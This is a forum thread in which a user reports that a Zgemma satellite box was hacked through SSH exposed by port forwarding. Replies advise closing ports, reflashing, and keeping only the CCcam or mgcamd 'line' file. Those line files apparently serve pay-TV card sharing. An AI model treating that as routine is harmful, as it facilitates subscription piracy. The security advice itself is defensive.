What's new
By:
Filters

Help - Box has been hacked.

J

JW_1822

Newbie
Hi,

First time posting on here but I thought it was a good place to start.

I had to move my router from near my box the other week and borrowed a usb wifi dongle from an old PC which worked a treat.

Unfortunately, fast forward a week or so and I have had my broadband disconnected because I have apparently been trying to access private networks over SSH.....

On further inspection, it dawned on me that the last time I had used that wifi dongle i had set up SSH (and other) port forwarding on my router so when i moved it to my box, I had inadvertently exposed it to the fun that is the open internet and some charming person seems to have hacked into my box and been using it for all sorts of fun as part of a little bot net or something...

Of course I have to take a significant amount of the blame here for my oversight but now I have a box which I cant plug into my network until I am sure its nice a clean and isn't going to start being naughty again....

Has anyone ever seen this before and does anyone have any advise on how best to proceed?

If the only option is to wipe the box, would anyone be able to point me in the right direction of what I should note down, copy over or otherwise back up so that I get back to where I was, minus any nasties which may have been installed.

I'm fairly literate with PCs / Linux etc so I should be able to find my way around the process, especially with some of the guides on here but as it stands I am a beginner with these boxes as unfortunately the box was set up by someone else who I cant get hold of to help.

Not sure what you would need to know but its a Zgemma 2S which seems to have "Virtuosso Image Xtreme" on it.

For anyone reading this who cant help - at least take a lesson from my stupidity and make sure your box is behind your firewall at all times.

Thanks!
 
Last edited:
Have you had your internet reconnected?
I think your easiest route would bye to backup your line and reflash your box as it will be pretty much impossible to know exactly what has been altered
To backup your line you will need to access it via ftp from a PC and copy it over to your computer (make sure you disconnect your router from the internet or at least whatever you changed to make it so insecure in the first place)
The line lives in the "etc" folder on openvix assuming you are using cccam and will be called CCcam.cfg
If your using mgcamd it could either be "etc" or usr/keys and will be called newline.line (not sure exactly which folder vix stores the mgcamd line file as I have never used vix but it will be one of the two)
Once you have the line file backed up install a new build from the stickies at the top of this forum and add your line back on
 
The only important thing on your box is the line. If you have that safely on your pc then great. If you don't, you need to copy the line from your box to somewhere safe.

Have you closed the router ports now? That needs doing.

Then just reflash your box with your chosen image, or go for Kiddac's bare bones setup.

DO NOT backup your settings as you don't know what your box is doing or what has been edited. Just flash it and wave goodbye to your series links.

Also, check the USB storage device in the box for anything that doesn't look right, or say sod it, lets initialse it and start from scratch. Wave bye bye to recordings.
 
Hi Guys,

Thanks for the quick replies!

Yes, I thought wiping and starting from scratch would probably be the best idea - There's nothing that important saved anyway fortunately.

Thanks for confirming the only important bits to copy over though, I'll be much more comfortable doing this now as I was worrying that once i had reflashed it, i'd find that i should have copied another critical file over.

All ports are firmly closed now - very stupid mistake this one but it does make you realise how quickly they can find an insecure device, get into it and start causing trouble though!

Cheers!
 
Yes, had it reconnected now fortunately.

I just explained what I'd done but just said it was another PC which I had put the wifi dongle into.

Before reconnecting me they wanted me to confirm I had either run security scans on all my devices or wiped them because once they have access to one device behind the firewall they can obviously access any other device within your network quite easily. You don't realise how many internet capable devices you have until you have to list them all!

The box is currently disconnected, but I had a couple of other Raspberry Pi servers doing odd bits and pieces which I'll just wipe and rebuild. We also have a couple of laptops which I've run scans on but nothing has turned up. The mobiles which connect to the WiFi I don't think are too much of a risk...and, I also have a ROKU box but I don't know if that's vulnerable at all and wouldn't know where to start if it was.

As a precaution, I've blocked all SSH outgoing connections on my router now and made it log any attempts, so at least I can see if there is anything within my network trying to connect to anything over SSH and deal with it before it causes a problem.

When I first called up to see why the internet wasn't working and they read me a pre-prepared statement along the lines of "You have had your services suspended due to an ongoing investigation into a breach of policy".

To say I was a little worried at that point was an understatement!
 
All he has to say is was it was without his knowledge and say it won't happen again as he has protection now (assuming you do, now.).

Just connect your box to your router but remove the internet cable going into it (or disable internet access in the settings)
Connect to your box over LAN and transfer any keys you need.

Then just reflash to be sure. And then transfer back your key.
 
You must log in or register to reply here.
Back
Top